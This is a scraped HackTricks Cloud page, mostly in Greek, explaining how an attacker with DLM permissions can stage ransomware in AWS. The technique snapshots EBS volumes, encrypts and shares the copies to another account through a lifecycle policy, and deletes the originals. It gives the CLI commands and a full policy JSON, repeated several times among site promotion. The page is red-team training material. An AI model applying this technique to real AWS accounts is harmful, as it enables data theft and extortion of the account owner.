AWS - DLM Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Data Lifecycle Manger (DLM)

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`

Μια επίθεση ransomware μπορεί να εκτελεστεί κρυπτογραφώντας όσο το δυνατόν περισσότερους EBS όγκους και στη συνέχεια διαγράφοντας τις τρέχουσες EC2 περιπτώσεις, EBS όγκους και στιγμιότυπα. Για να αυτοματοποιηθεί αυτή η κακόβουλη δραστηριότητα, μπορεί κανείς να χρησιμοποιήσει το Amazon DLM, κρυπτογραφώντας τα στιγμιότυπα με ένα KMS κλειδί από άλλο AWS λογαριασμό και μεταφέροντας τα κρυπτογραφημένα στιγμιότυπα σε διαφορετικό λογαριασμό. Εναλλακτικά, μπορεί να μεταφέρει στιγμιότυπα χωρίς κρυπτογράφηση σε έναν λογαριασμό που διαχειρίζεται και στη συνέχεια να τα κρυπτογραφήσει εκεί. Αν και δεν είναι απλό να κρυπτογραφήσει κανείς υπάρχοντες EBS όγκους ή στιγμιότυπα απευθείας, είναι δυνατόν να το κάνει δημιουργώντας έναν νέο όγκο ή στιγμιότυπο.

Αρχικά, θα χρησιμοποιήσει μια εντολή για να συγκεντρώσει πληροφορίες σχετικά με τους όγκους, όπως το ID της περιπτώσης, το ID του όγκου, την κατάσταση κρυπτογράφησης, την κατάσταση προσάρτησης και τον τύπο του όγκου.

aws ec2 describe-volumes

Δεύτερον, θα δημιουργήσει την πολιτική κύκλου ζωής. Αυτή η εντολή χρησιμοποιεί το DLM API για να ρυθμίσει μια πολιτική κύκλου ζωής που αυτόματα λαμβάνει καθημερινά στιγμιότυπα των καθορισμένων όγκων σε μια καθορισμένη ώρα. Επίσης, εφαρμόζει συγκεκριμένες ετικέτες στα στιγμιότυπα και αντιγράφει ετικέτες από τους όγκους στα στιγμιότυπα. Το αρχείο policyDetails.json περιλαμβάνει τις λεπτομέρειες της πολιτικής κύκλου ζωής, όπως οι στοχευμένες ετικέτες, το πρόγραμμα, το ARN του προαιρετικού KMS κλειδιού για κρυπτογράφηση και τον στοχευόμενο λογαριασμό για κοινή χρήση στιγμιότυπων, ο οποίος θα καταγραφεί στα αρχεία CloudTrail του θύματος.

aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

Ένα πρότυπο για το έγγραφο πολιτικής μπορεί να δει εδώ:

{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - Control Tower Post Exploitation NextAWS - DynamoDB Post Exploitation

Last updated 3 days ago

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

aws ec2 describe-volumes

aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

Ένα πρότυπο για το έγγραφο πολιτικής μπορεί να δει εδώ:

{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`

`EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`